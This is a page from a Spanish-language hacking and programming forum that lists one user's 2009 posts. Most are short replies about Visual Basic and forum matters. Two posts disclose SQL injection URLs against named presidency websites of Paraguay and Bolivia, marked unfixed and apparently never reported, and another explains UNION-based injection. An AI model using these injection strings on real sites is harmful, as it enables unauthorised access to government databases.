últimos mensajes de: Krackwar ™ - Página 5

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

4 Mayo 2024, 23:09 pm

Tema destacado: Como proteger una cartera - billetera de Bitcoin

Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6

41	Seguridad Informática / Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection	en: 17 Febrero 2009, 19:58 pm
Sitio web: http://www.presidencia.gov.py Descubridor: N1GHTSCR34M URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html Fecha de descubrimiento: 17.02.09 Fecha de notificación: --- Fecha de publicación: 17.02.09 Arreglado: No Información adicional: Código: http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))

42	Seguridad Informática / Nivel Web / Re: Inyeccion Sql Filtro	en: 17 Febrero 2009, 18:00 pm
Cita de: Azielito en 17 Febrero 2009, 17:42 pm perdon, es que me hizo gracia no es personal pues, disculpa... No importa Citar Te explico cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto Código SELECT * FROM `noticias` WHERE id=$_GET['id'] Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT" quedando algo así Código SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2..... ^aqui nuestro code o sea que, el "SELECT" va implicito Si me lo explicabas a mi , ya lo se si se hacer consultas desde PHP , aunque nunca esta de mas una explicacion para los que no entienden

43	Seguridad Informática / Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection	en: 17 Febrero 2009, 07:10 am
Sitio web: http://www.presidencia.gob.bo Descubridor: N1GHTSCR34M URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html Fecha de descubrimiento: 17.02.09 Fecha de notificación: --- Fecha de publicación: 17.02.09 Arreglado: No Información adicional: Código: http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))

44	Seguridad Informática / Nivel Web / Re: Inyeccion Sql Filtro	en: 17 Febrero 2009, 02:01 am
No te rias toy enfermo a si que no tengo todas mis neuronas funcionando . Si , cierto que el select esta en el noticia.php.

45	Foros Generales / Sugerencias y dudas sobre el Foro / Re: Carga de Foro	en: 16 Febrero 2009, 22:32 pm
A mi no me pasa

46	Seguridad Informática / Nivel Web / Re: Inyeccion Sql Filtro	en: 16 Febrero 2009, 22:28 pm
hay no veo ningun select

47	Programación / Programación Visual Basic / Re: ¿como puedo crear un programa que genere anagramas?	en: 16 Febrero 2009, 04:15 am
Este es otro ejemplo de los tipicos que quieren que le hagan la tarea , ultimamente se estan viendo mucho.

48	Programación / Programación Visual Basic / Re: Pa kien todo lo sabe sobre envio de correo desde VB	en: 15 Febrero 2009, 18:42 pm
Si pero yo no lo revivi

49	Programación / Programación Visual Basic / Re: Pa kien todo lo sabe sobre envio de correo desde VB	en: 15 Febrero 2009, 05:57 am
Usen las etiquetas de codigo Código Msgbox "Uso las etiquetas de codigo (code=vb)"

50	Programación / Programación Visual Basic / Re: Mandar la informacion de un texbox a un label en Visual basic6.0	en: 13 Febrero 2009, 20:53 pm
Deja de postear 2 veces cada cosa y leete un manual flojo de mie*** , lo mejor seria que no le respondieran nada a este tipoo.

Páginas: 1 2 3 4 [5] 6

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines